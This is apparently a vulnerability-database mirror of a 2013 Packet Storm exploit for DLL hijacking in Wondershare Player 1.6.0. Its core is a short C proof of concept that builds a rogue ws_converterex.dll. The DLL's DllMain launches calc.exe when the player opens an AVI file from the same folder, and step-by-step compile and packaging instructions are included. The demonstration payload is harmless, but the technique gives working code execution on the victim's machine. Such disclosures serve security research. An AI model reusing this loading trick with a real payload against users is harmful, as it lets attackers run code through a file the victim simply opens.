Lucene search
+L

Wondershare Player 1.6.0 DLL Hijacking

🗓️ 27 Nov 2013 00:00:00Reported by Akin TosunlarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Wondershare Player DLL Hijacking Vulnerabilit

Code
`/* # Exploit Title: Wondershare Player 1.6.0 (ws_converterex.dll) - DLL Hijacking Vulnerability  
// # Date: 27.11.2013  
// # Exploit Author: Akin Tosunlar  
// # Software Link: http://download.wondershare.com/player_full1374.exe  
// # Version: 1.6.0 (Probably old version of software and the LATEST version too)  
// # Vendor Homepage: http://www.wondershare.com  
// # Tested on: [ Windows XP sp3]  
// # Contact : [email protected]  
// #------------------  
// # Web Page : http://www.vigasis.com  
// #   
// # YOUTUBE EXPLOIT VIDEO: https://www.youtube.com/watch?v=EKu_-uKKmDA  
// #  
// # gcc -shared -o ws_converterex.dll evil.c  
// # Compile evil.c and rar or zip avi file and ws_converterex.dll same folder. Associate Default Player as Wondershare Player or OpenWith Wondershare Player.Double-click AVI File. program start Calc.exe immediately.  
// #  
*/   
  
  
#include <windows.h>  
  
int evilcode()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
evilcode();  
return 0;  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Nov 2013 00:00Current
0.1Low risk
Vulners AI Score0.1
32